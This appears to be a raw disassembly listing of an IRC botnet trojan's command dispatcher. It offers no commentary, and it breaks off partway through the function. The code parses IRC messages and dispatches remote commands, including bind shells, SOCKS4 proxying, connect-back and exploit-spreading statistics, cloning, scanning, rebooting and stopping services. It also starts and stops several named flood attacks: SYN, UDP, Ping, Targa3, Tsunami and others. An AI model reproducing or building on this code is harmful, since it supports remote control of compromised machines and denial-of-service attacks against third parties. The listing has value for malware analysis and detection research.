lea eax, [ebp+var_1A7C]
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 1Ch
mov [ebp+var_19F4], eax
mov eax, [ebp+var_8]
mov [ebp+var_19F0], eax
lea eax, [ebp+var_1A7C]
push eax
lea eax, [ebp+var_1B80]
push eax
lea eax, [ebp+Dst]
push offset asc_440D64 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 1Ah ; int
push eax ; Source
call sub_40B78E
add esp, 1Ch
mov [ebp+var_19F8], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1B9C]
push ebx
push eax
push offset sub_416D5D
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_19F8]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz loc_4025AC
loc_402477: ; CODE XREF: sub_401CC7+7C4�j
cmp [ebp+var_19EC], ebx
jnz loc_408708
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_402477
; ---------------------------------------------------------------------------
loc_40248D: ; CODE XREF: sub_401CC7+645�j
; sub_401CC7+65A�j
push esi ; Str2
push offset aNotice_1 ; "NOTICE"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4024A5
mov [ebp+var_4], 1
loc_4024A5: ; CODE XREF: sub_401CC7+7D5�j
mov edi, [ebp+Format]
cmp edi, ebx
jz loc_402166
push offset asc_440D00 ; "#"
push edi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_4024C9
cmp [ebp+var_4], ebx
jz short loc_4024D5
loc_4024C9: ; CODE XREF: sub_401CC7+7FB�j
lea edi, [ebp+var_C0]
mov [ebp+Format], edi
loc_4024D5: ; CODE XREF: sub_401CC7+800�j
cmp [ebp+Str2], ebx
jz loc_402166
inc [ebp+Str2]
jz short loc_40251F
cmp [ebp+Source], ebx
jz short loc_40251F
lea eax, [ebp+Str1]
push eax ; Str
call _strlen
push eax ; MaxCount
lea eax, [ebp+Str1]
push [ebp+Str2] ; Str2
push eax ; Str1
call _strncmp
add esp, 10h
neg eax
sbb eax, eax
add eax, 4
mov [ebp+var_A4], eax
jmp short loc_402525
; ---------------------------------------------------------------------------
loc_40251F: ; CODE XREF: sub_401CC7+820�j
; sub_401CC7+825�j
mov eax, [ebp+var_A4]
loc_402525: ; CODE XREF: sub_401CC7+856�j
shl eax, 2
mov [ebp+arg_8], eax
mov esi, [ebp+eax+var_90]
cmp esi, ebx
jz loc_402166
push esi ; Str2
push offset dword_440D04 ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_402340
cmp byte ptr [edi], 23h
jz short loc_402570
mov eax, dword_4E40B4
mov eax, off_440134[eax*4]
cmp [eax], bl
jz short loc_402570
push eax
push edi
push offset dword_440D10
jmp loc_40207E
; ---------------------------------------------------------------------------
loc_402570: ; CODE XREF: sub_401CC7+88B�j
; sub_401CC7+89B�j
push esi ; Str2
push offset dword_440D2C ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_402340
mov eax, [ebp+arg_8]
mov eax, dword ptr [ebp+eax+Args]
cmp eax, ebx
jz loc_402340
cmp byte ptr [edi], 23h
jz loc_402340
push eax
push edi
push offset dword_440D34
jmp loc_40207E
; ---------------------------------------------------------------------------
loc_4025AC: ; CODE XREF: sub_401CC7+7AA�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_440D94
jmp loc_4086F9
; ---------------------------------------------------------------------------
loc_4025BD: ; CODE XREF: sub_401CC7+6CB�j
lea eax, [ebp+var_C0]
push eax
push [ebp+esi+Format]
push offset asc_440DD0 ; "-"
loc_4025D0: ; CODE XREF: sub_401CC7+7F22�j
; sub_401CC7+7F89�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 10h
jmp loc_408708
; ---------------------------------------------------------------------------
loc_4025E4: ; CODE XREF: sub_401CC7+6BF�j
push dword ptr [ebp+esi+Args] ; Str2
push offset aChat ; "CHAT"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_402733
cmp [ebp+var_A8], ebx
jz loc_40270C
push 1Bh
call sub_40B9D6
test eax, eax
pop ecx
jnz loc_4026FB
push [ebp+esi+Str2]
lea eax, [ebp+var_2AA8]
push offset aS_1 ; "%s"
push eax ; Dest
call _sprintf
push [ebp+esi+var_80] ; Str
call _atoi
mov [ebp+var_2910], eax
mov eax, [ebp+arg_4]
mov [ebp+var_2AB0], eax
lea eax, [ebp+var_C0]
push 7Fh ; Count
push eax ; Source
lea eax, [ebp+var_2990]
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 1Ch
mov [ebp+var_2908], eax
mov eax, [ebp+var_8]
mov [ebp+var_2904], eax
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+Dst]
push offset asc_440E20 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 1Bh ; int
push eax ; Source
call sub_40B78E
add esp, 18h
mov [ebp+var_290C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2AB0]
push ebx
push eax
push offset sub_4167F7
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_290C]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_4026EA
loc_4026D4: ; CODE XREF: sub_401CC7+A21�j
cmp [ebp+var_2900], ebx
jnz loc_408708
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_4026D4
; ---------------------------------------------------------------------------
loc_4026EA: ; CODE XREF: sub_401CC7+A0B�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_440E40
jmp loc_4086F9
; ---------------------------------------------------------------------------
loc_4026FB: ; CODE XREF: sub_401CC7+94E�j
lea eax, [ebp+var_C0]
push eax
push offset unk_440E78
jmp loc_4086F9
; ---------------------------------------------------------------------------
loc_40270C: ; CODE XREF: sub_401CC7+93E�j
lea eax, [ebp+var_C0]
push eax
push offset unk_440EA8
jmp loc_4086F9
; ---------------------------------------------------------------------------
loc_40271D: ; CODE XREF: sub_401CC7+6A4�j
mov eax, [ebp+arg_8]
lea ecx, [eax+1]
mov al, [eax]
cmp al, byte_440090
mov [edi], ecx
jnz loc_402166
loc_402733: ; CODE XREF: sub_401CC7+932�j
mov edi, [edi]
push edi ; Str2
push offset aLogin ; "login"
mov [ebp+arg_8], edi
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409B4F
push edi ; Str2
push offset asc_440EE4 ; "l"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409B4F
cmp [ebp+var_A8], ebx
jnz short loc_402784
push dword ptr [ebp+Args] ; Str2
push offset a332_3 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_409B47
loc_402784: ; CODE XREF: sub_401CC7+AA1�j
cmp [ebp+arg_28], ebx
jnz loc_409B47
xor edi, edi
cmp dword_440498, ebx
jle loc_402939
mov [ebp+arg_20], offset dword_4563A8
loc_4027A2: ; CODE XREF: sub_401CC7+AFA�j
push [ebp+arg_8] ; Str2
push [ebp+arg_20] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_4027C8
add [ebp+arg_20], 0B8h
inc edi
cmp edi, dword_440498
jl short loc_4027A2
jmp loc_402939
; ---------------------------------------------------------------------------
loc_4027C8: ; CODE XREF: sub_401CC7+AEA�j
push offset asc_441034 ; " :"
push [ebp+Src] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz loc_402166
mov cl, byte_440090
imul edi, 0B8h
mov [eax+2], cl
mov cl, byte_440090
mov [eax+3], cl
lea ecx, dword_4563C0[edi]
push 9Fh ; Count
add eax, 4
push ecx ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+esi+var_50]
add esp, 0Ch
mov [ebp+arg_8], 0Fh
mov [ebp+arg_20], eax
loc_40281D: ; CODE XREF: sub_401CC7+C07�j
push [ebp+arg_8]
lea eax, [ebp+SubStr]
push offset aD ; "$%d-"
push eax ; Dest
call _sprintf
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Str
call _strstr
add esp, 14h
test eax, eax
jz short loc_402889
mov eax, [ebp+arg_20]
cmp [eax], ebx
jz short loc_402889
lea eax, dword_4563A8[edi]
push eax ; Str
call _strlen
add [ebp+var_C], eax
pop ecx
jz short loc_4028C4
mov eax, [ebp+arg_20]
push dword ptr [eax-4] ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_4028C4
push eax ; Source
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Src
call sub_418C3F
add esp, 0Ch
jmp short loc_4028C4
; ---------------------------------------------------------------------------
loc_402889: ; CODE XREF: sub_401CC7+B7E�j
; sub_401CC7+B85�j
mov eax, [ebp+arg_20]
cmp [eax], ebx
jnz short loc_4028C4
lea eax, [ebp+SubStr]
push 2 ; Count
push eax ; Source
lea eax, [ebp+var_94]
push eax ; Dest
call _strncpy
lea eax, [ebp+var_94]
mov [ebp+var_92], bl
push eax ; Source
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Src
call sub_418C3F
add esp, 18h
loc_4028C4: ; CODE XREF: sub_401CC7+B97�j
; sub_401CC7+BAB�j ...
dec [ebp+arg_8]
sub [ebp+arg_20], 4
cmp [ebp+arg_8], ebx
jg loc_40281D
lea eax, [ebp+esi+var_50]
mov [ebp+arg_8], 10h
mov edi, eax
loc_4028E1: ; CODE XREF: sub_401CC7+C66�j
push [ebp+arg_8]
lea eax, [ebp+SubStr]
push offset aD_0 ; "$%d"
push eax ; Dest
call _sprintf
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Str
call _strstr
add esp, 14h
test eax, eax
jz short loc_402924
mov eax, [edi]
cmp eax, ebx
jz short loc_402924
push eax ; Source
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Src
call sub_418C3F
add esp, 0Ch
loc_402924: ; CODE XREF: sub_401CC7+C42�j
; sub_401CC7+C48�j
dec [ebp+arg_8]
sub edi, 4
cmp [ebp+arg_8], ebx
jg short loc_4028E1
mov [ebp+var_2C4], 1
loc_402939: ; CODE XREF: sub_401CC7+ACE�j
; sub_401CC7+AFC�j
mov eax, [ebp+esi+var_90]
mov al, [eax]
cmp al, byte_440090
jz short loc_402956
cmp [ebp+var_2C4], ebx
jz loc_402B4B
loc_402956: ; CODE XREF: sub_401CC7+C81�j
push [ebp+Source] ; Source
mov edi, [ebp+Src]
push offset aMe ; "$me"
push edi ; Src
call sub_418C3F
lea eax, [ebp+var_C0]
push eax ; Source
push offset aUser ; "$user"
push edi ; Src
call sub_418C3F
push [ebp+Format] ; Source
push offset aChan ; "$chan"
push edi ; Src
call sub_418C3F
push ebx ; Str1
push ebx ; int
lea eax, [ebp+SubStr]
push 2 ; int
push eax ; Dest
call sub_40B487
push eax ; Source
push offset aRndnick ; "$rndnick"
push edi ; Src
call sub_418C3F
add esp, 40h
push [ebp+arg_14] ; Source
push offset aServer ; "$server"
push edi ; Src
call sub_418C3F
mov edi, offset aChr ; "$chr("
push edi ; SubStr
push [ebp+Src] ; Str
call _strstr
add esp, 14h
loc_4029C8: ; CODE XREF: sub_401CC7+DFD�j
test eax, eax
jz loc_402AC9
push offset aChr_0 ; "$chr("
push [ebp+Src] ; Str
call _strstr
mov [ebp+Source], eax
add eax, 5
push 4 ; Count
push eax ; Source
lea eax, [ebp+SubStr]
push eax ; Dest
call _strncpy
lea eax, [ebp+SubStr]
push offset asc_44107C ; ")"
push eax ; Str
call _strtok
add esp, 1Ch
cmp [ebp+SubStr], 30h
jl short loc_402A18
cmp [ebp+SubStr], 39h
jle short loc_402A2E
loc_402A18: ; CODE XREF: sub_401CC7+D46�j
push 3 ; Count
lea eax, [ebp+SubStr]
push offset a63 ; "63"
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_402A2E: ; CODE XREF: sub_401CC7+D4F�j
lea eax, [ebp+SubStr]
push eax ; Str
call _atoi
test eax, eax
pop ecx
jle short loc_402A54
lea eax, [ebp+SubStr]
push eax ; Str
call _atoi
pop ecx
mov [ebp+var_94], al
jmp short loc_402A68
; ---------------------------------------------------------------------------
loc_402A54: ; CODE XREF: sub_401CC7+D76�j
call _rand
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+var_94], dl
loc_402A68: ; CODE XREF: sub_401CC7+D8B�j
lea eax, [ebp+SubStr]
mov [ebp+var_93], bl
push eax ; Str
call _strlen
mov [ebp+arg_8], eax
push 0Ch ; Size
lea eax, [ebp+SubStr]
push ebx ; Val
push eax ; Dst
call _memset
mov eax, [ebp+arg_8]
add eax, 6
push eax ; Count
lea eax, [ebp+SubStr]
push [ebp+Source] ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+var_94]
push eax ; Source
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Src
call sub_418C3F
push edi ; SubStr
push [ebp+Src] ; Str
call _strstr
add esp, 30h
jmp loc_4029C8
; ---------------------------------------------------------------------------
loc_402AC9: ; CODE XREF: sub_401CC7+D03�j
mov edi, 1FFh
lea eax, [ebp+Str]
push edi ; Count
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+Str]
push edi ; Count
push eax ; Source
lea eax, [ebp+var_4AF0]
push eax ; Dest
call _strncpy
lea eax, [ebp+var_4AF0]
push offset asc_441084 ; " "
push eax ; Str
call _strtok
add esp, 20h
mov [ebp+var_90], eax
lea edi, [ebp+Args]
mov [ebp+Source], 1Fh
loc_402B19: ; CODE XREF: sub_401CC7+E67�j
push offset asc_441088 ; " "
push ebx ; Str
call _strtok
mov [edi], eax
pop ecx
add edi, 4
dec [ebp+Source]
pop ecx
jnz short loc_402B19
mov ecx, [ebp+esi+var_90]
lea eax, [ebp+esi+var_90]
cmp ecx, ebx
jz loc_402166
add ecx, 3
mov [eax], ecx
loc_402B4B: ; CODE XREF: sub_401CC7+C89�j
mov edi, [ebp+esi+var_90]
push edi ; Str2
push offset aRndnick_0 ; "rndnick"
mov [ebp+arg_8], edi
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409AF5
push edi ; Str2
push offset aRn ; "rn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409AF5
push edi ; Str2
push offset aDie ; "die"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404BFF
push edi ; Str2
push offset aD_1 ; "d"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404BFF
push edi ; Str2
push offset aLogout ; "logout"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404B57
push edi ; Str2
push offset aLo ; "lo"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404B57
push edi ; Str2
push offset aVersion ; "version"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404B48
push edi ; Str2
push offset aVer ; "ver"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404B48
push edi ; Str2
push offset aDedication ; "dedication"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404B3E
push edi ; Str2
push offset aDed ; "ded"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404B3E
push edi ; Str2
push offset aSpeedtest ; "speedtest"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404B25
push edi ; Str2
push offset aSt ; "st"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404B25
push edi ; Str2
push offset aSecure ; "secure"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404A27
push edi ; Str2
push offset aSec ; "sec"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404A27
push edi ; Str2
push offset aUnsecure ; "unsecure"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404A27
push edi ; Str2
push offset aUnsec ; "unsec"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404A27
push edi ; Str2
push offset aBindshell ; "bindshell"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404921
push edi ; Str2
push offset aBd ; "bd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404921
push edi ; Str2
push offset aBindshellstop ; "bindshellstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402CF8
push dword ptr [ebp+esi+Args]
push 6
push offset aServer_0 ; "Server"
push offset dword_441394
jmp loc_4047E3
; ---------------------------------------------------------------------------
loc_402CF8: ; CODE XREF: sub_401CC7+1017�j
push edi ; Str2
push offset aSocks4 ; "socks4"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4047FF
push edi ; Str2
push offset aS4 ; "s4"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4047FF
push edi ; Str2
push offset aSocks4stop ; "socks4stop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402D4B
push dword ptr [ebp+esi+Args]
push 19h
push offset aServer_1 ; "Server"
push offset dword_44142C
jmp loc_4047E3
; ---------------------------------------------------------------------------
loc_402D4B: ; CODE XREF: sub_401CC7+106A�j
push edi ; Str2
push offset aRloginstop ; "rloginstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402D74
push dword ptr [ebp+esi+Args]
push 9
push offset aServer_2 ; "Server"
push offset dword_441450
jmp loc_4047E3
; ---------------------------------------------------------------------------
loc_402D74: ; CODE XREF: sub_401CC7+1093�j
push edi ; Str2
push offset aHttpstop ; "httpstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402D9D
push dword ptr [ebp+esi+Args]
push 3
push offset aServer_3 ; "Server"
push offset dword_441474
jmp loc_4047E3
; ---------------------------------------------------------------------------
loc_402D9D: ; CODE XREF: sub_401CC7+10BC�j
push edi ; Str2
push offset aLogstop ; "logstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402DC6
push dword ptr [ebp+esi+Args]
push 25h
push offset aLogList ; "Log list"
push offset dword_441498
jmp loc_4047E3
; ---------------------------------------------------------------------------
loc_402DC6: ; CODE XREF: sub_401CC7+10E5�j
push edi ; Str2
push offset aRedirectstop ; "redirectstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402DEF
push dword ptr [ebp+esi+Args]
push 18h
push offset aTcpRedirect ; "TCP redirect"
push offset dword_4414C4
jmp loc_4047E3
; ---------------------------------------------------------------------------
loc_402DEF: ; CODE XREF: sub_401CC7+110E�j
push edi ; Str2
push offset aDdos_stop ; "ddos.stop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402E18
push dword ptr [ebp+esi+Args]
push 0Dh
push offset aDdosFlood ; "DDoS flood"
push offset dword_4414EC
jmp loc_4047E3
; ---------------------------------------------------------------------------
loc_402E18: ; CODE XREF: sub_401CC7+1137�j
push edi ; Str2
push offset aSynstop ; "synstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402E41
push dword ptr [ebp+esi+Args]
push 0Eh
push offset aSynFlood ; "Syn flood"
push offset dword_44150C
jmp loc_4047E3
; ---------------------------------------------------------------------------
loc_402E41: ; CODE XREF: sub_401CC7+1160�j
push edi ; Str2
push offset aSkysynstop ; "skysynstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402E6A
push dword ptr [ebp+esi+Args]
push 10h
push offset aSkysynFlood ; "SkySyn flood"
push offset dword_441534
jmp loc_4047E3
; ---------------------------------------------------------------------------
loc_402E6A: ; CODE XREF: sub_401CC7+1189�j
push edi ; Str2
push offset aTarga3stop ; "targa3stop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402E93
push dword ptr [ebp+esi+Args]
push 11h
push offset aTarga3Flood ; "Targa3 flood"
push offset dword_441560
jmp loc_4047E3
; ---------------------------------------------------------------------------
loc_402E93: ; CODE XREF: sub_401CC7+11B2�j
push edi ; Str2
push offset aWonkstop ; "wonkstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402EBC
push dword ptr [ebp+esi+Args]
push 12h
push offset aWonkFlood ; "Wonk flood"
push offset dword_441588
jmp loc_4047E3
; ---------------------------------------------------------------------------
loc_402EBC: ; CODE XREF: sub_401CC7+11DB�j
push edi ; Str2
push offset aPacketstop ; "packetstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_403012
mov esi, dword ptr [ebp+esi+Args]
mov edi, [ebp+arg_4]
push esi ; Str
push 0Dh ; int
push offset aDdosFlood_0 ; "DDoS flood"
push offset dword_4415AC ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40BA1C
push esi ; Str
push 0Eh ; int
push offset aSynFlood_0 ; "Syn flood"
push offset dword_4415C4 ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40BA1C
add esp, 40h
push esi ; Str
push 17h ; int
push offset aUdpFlood ; "UDP flood"
push offset dword_4415DC ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40BA1C
push esi ; Str
push 16h ; int
push offset aPingFlood ; "Ping flood"
push offset dword_4415F4 ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40BA1C
add esp, 40h
push esi ; Str
push 11h ; int
push offset aTarga3Flood_0 ; "Targa3 flood"
push offset dword_441610 ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40BA1C
push esi ; Str
push 12h ; int
push offset aWonkFlood_0 ; "Wonk flood"
push offset dword_44162C ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40BA1C
add esp, 40h
push esi ; Str
push 0Fh ; int
push offset aTsunamiFlood ; "Tsunami flood"
push offset dword_441648 ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40BA1C
push esi ; Str
push 13h ; int
push offset aWisdomAttack ; "Wisdom attack"
push offset dword_441668 ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40BA1C
add esp, 40h
push esi ; Str
push 10h ; int
push offset aSkysynFlood_0 ; "SkySyn flood"
push offset dword_441688 ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40BA1C
push ebx ; int
push [ebp+var_4] ; int
push offset unk_441698 ; int
push [ebp+Format] ; Str
push edi ; int
call sub_409D6C
add esp, 34h
jmp loc_402166
; ---------------------------------------------------------------------------
loc_403012: ; CODE XREF: sub_401CC7+1204�j
push edi ; Str2
push offset aTsunamistop ; "tsunamistop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40303B
push dword ptr [ebp+esi+Args]
push 0Fh
push offset aTsunamiFlood_0 ; "Tsunami flood"
push offset dword_4416E8
jmp loc_4047E3
; ---------------------------------------------------------------------------
loc_40303B: ; CODE XREF: sub_401CC7+135A�j
push edi ; Str2
push offset aWisdomstop ; "wisdomstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_403064
push dword ptr [ebp+esi+Args]
push 13h
push offset aWisdomAttack_0 ; "Wisdom attack"
push offset dword_441714
jmp loc_4047E3
; ---------------------------------------------------------------------------
loc_403064: ; CODE XREF: sub_401CC7+1383�j
push edi ; Str2
push offset aUdpstop ; "udpstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40308D
push dword ptr [ebp+esi+Args]
push 17h
push offset aUdpFlood_0 ; "UDP flood"
push offset dword_441738
jmp loc_4047E3
; ---------------------------------------------------------------------------
loc_40308D: ; CODE XREF: sub_401CC7+13AC�j
push edi ; Str2
push offset aPingstop ; "pingstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4030B6
push dword ptr [ebp+esi+Args]
push 16h
push offset aPingFlood_0 ; "Ping flood"
push offset dword_44175C
jmp loc_4047E3
; ---------------------------------------------------------------------------
loc_4030B6: ; CODE XREF: sub_401CC7+13D5�j
push edi ; Str2
push offset aTftpstop ; "tftpstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4030DF
push dword ptr [ebp+esi+Args]
push 5
push offset aServer_4 ; "Server"
push offset dword_44177C
jmp loc_4047E3
; ---------------------------------------------------------------------------
loc_4030DF: ; CODE XREF: sub_401CC7+13FE�j
push edi ; Str2
push offset aFindfilestop ; "findfilestop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4047D0
push edi ; Str2
push offset aFfstop ; "ffstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4047D0
push edi ; Str2
push offset aProcsstop ; "procsstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4047BB
push edi ; Str2
push offset aPsstop ; "psstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4047BB
push edi ; Str2
push offset aClonestop ; "clonestop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40315C
push dword ptr [ebp+esi+Args]
push 1Fh
push offset aClone ; "Clone"
push offset dword_441808
jmp loc_4047E3
; ---------------------------------------------------------------------------
loc_40315C: ; CODE XREF: sub_401CC7+147B�j
push edi ; Str2
push offset aSecurestop ; "securestop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_403185
push dword ptr [ebp+esi+Args]
push 22h
push offset aSecure_0 ; "Secure"
push offset dword_44182C
jmp loc_4047E3
; ---------------------------------------------------------------------------
loc_403185: ; CODE XREF: sub_401CC7+14A4�j
push edi ; Str2
push offset aScanstop ; "scanstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4031AE
push dword ptr [ebp+esi+Args]
push 0Bh
push offset aScan ; "Scan"
push offset dword_441850
jmp loc_4047E3
; ---------------------------------------------------------------------------
loc_4031AE: ; CODE XREF: sub_401CC7+14CD�j
push edi ; Str2
push offset aScanstats ; "scanstats"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4047A5
push edi ; Str2
push offset aStats ; "stats"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4047A5
push edi ; Str2
push offset aTransferstats ; "transferstats"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40478F
push edi ; Str2
push offset aTrstats ; "trstats"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40478F
push edi ; Str2
push offset aConnectbacksta ; "connectbackstats"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404779
push edi ; Str2
push offset aCbstats ; "cbstats"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404779
push edi ; Str2
push offset aExploitlist ; "exploitlist"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404763
push edi ; Str2
push offset aExplist ; "explist"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404763
push edi ; Str2
push offset aReconnect ; "reconnect"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404744
push edi ; Str2
push offset aR ; "r"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404744
push edi ; Str2
push offset aDisconnect ; "disconnect"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404722
push edi ; Str2
push offset aDc ; "dc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404722
push edi ; Str2
push offset aQuit_0 ; "quit"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4046DA
push edi ; Str2
push offset aQ ; "q"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4046DA
push edi ; Str2
push offset aStatus ; "status"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4046C6
push edi ; Str2
push offset aS_2 ; "s"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4046C6
push edi ; Str2
push offset aId ; "id"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40468F
push edi ; Str2
push offset aI_0 ; "i"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40468F
push edi ; Str2
push offset aReboot ; "reboot"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40337A
call sub_41910C
test eax, eax
mov eax, offset asc_4419C8 ; "-"
jnz short loc_40334C
mov eax, offset unk_4419E8
loc_40334C: ; CODE XREF: sub_401CC7+167E�j
push eax ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 1Ch
jmp loc_408708
; ---------------------------------------------------------------------------
loc_40337A: ; CODE XREF: sub_401CC7+1670�j
push edi ; Str2
push offset aThreads ; "threads"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4045B0
push edi ; Str2
push offset aT ; "t"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4045B0
push edi ; Str2
push offset aAliases ; "aliases"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40458D
push edi ; Str2
push offset aAl ; "al"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40458D
push edi ; Str2
push offset aLog ; "log"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40449A
push edi ; Str2
push offset aLg ; "lg"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40449A
push edi ; Str2
push offset aClearlog ; "clearlog"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40447E
push edi ; Str2
push offset aClg ; "clg"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40447E
push edi ; Str2
push offset aNetinfo ; "netinfo"
call _strcmp
pop ecx
test eax, eax
